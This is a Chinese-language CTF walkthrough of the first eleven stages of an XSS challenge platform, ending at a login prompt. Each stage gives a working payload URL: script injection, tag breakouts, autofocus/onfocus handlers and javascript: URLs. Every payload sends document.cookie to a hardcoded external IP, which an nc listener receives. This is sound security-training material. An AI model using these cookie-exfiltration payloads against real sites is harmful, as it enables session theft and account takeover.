前言

做了一个xss平台的题目，一共34题，题目还不错，这里记录一下解题记录
题目地址：传送门

题目

这个平台接收flag的形式和其它平台不同，得用vps或者是用xss平台去接收cookie（flag在cookie中）

stage1

第一关它是告诉你你怎么去获取flag的
直接把你的payload在这里提交（记住一定是要在这个填入你的payload），然后用你的vps去接受flag就行了

payload

http://8293927d3c84ed42eef26dd9ceaaa3d9bf448dda.knock.xss.moe/?location=`http://134.175.33.164:1234/?${document.cookie}`

然后服务器端用nc监听接收flag

nc -lvvkp 1234

可以看到成功接收到了flag

stage2

第二关直接可以嵌入js代码

payload

http://1a31198b4289ff3af4f7195a810c48eba9f6bf28.knock.xss.moe/?q=<script>document.location=`http://134.175.33.164:1234/?${document.cookie}`</script>

stage3

第三关q参数可控，直接闭合a标签

payload

http://68e3b596ebf790e8a781b8d87b84af7eb7b0aeb3.knock.xss.moe/?q="><script>document.location=`http://134.175.33.164:1234/?${document.cookie}`</script>

stage4

和第三关同理，只不过把双引号变成了单引号

payload

http://2375e1f80fe2ec262a235d594fbcee96dba66710.knock.xss.moe/?q='><script>document.location=`http://134.175.33.164:1234/?${document.cookie}`</script>

stage5

直接闭合textarea标签

payload

http://fea7c73bbe92f7880fc15514e076e838d2ce8a90.knock.xss.moe/?q=</textarea><script>document.location=`http://134.175.33.164:1234/?${document.cookie}`</script>

stage6

直接闭合xmp

payload

http://d82fe27901fa05dcfa8980262fc811645543e374.knock.xss.moe/?q=</xmp><script>document.location=`http://134.175.33.164:1234/?${document.cookie}`</script>

stage7

第七关尖括号被转义了

我们可以用onfocus事件，并且用它的autofocus属性去触发onfocus事件
payload

http://8005f6694d2862438bad3715436522e27dbd81a4.knock.xss.moe/?q=XSS" autofocus onfocus="document.location=`http://134.175.33.164:1234/?${document.cookie}`

stage8

和第七关同理，只不过把双引号变成了单引号

payload

http://b65797d44372ecb2b2552e32f10ec75f1bddcca6.knock.xss.moe/?q=xss' autofocus onfocus='document.location=`http://134.175.33.164:1234/?${document.cookie}`

stage9

和第七关同理，但是没有引号

payload

http://e461f5f6c542ae79ccc144093c63d0b074e591cd.knock.xss.moe/?q=XSS autofocus onfocus=document.location=`http://134.175.33.164:1234/?${document.cookie}`

stage10

这题双引号被转义了，无法闭合双引号。所以我们可以考虑用javascript伪协议

http://811fbf0db9c40565743a37c2978f812b82eb89a6.knock.xss.moe/?q=javascript:document.location=`http://134.175.33.164:1234/?${document.cookie}`

stage11

和stage10同理

登录并阅读全文

前言

题目

stage1

stage2

stage3

stage4

stage5

stage6

stage7

stage8

stage9

stage10

stage11

目录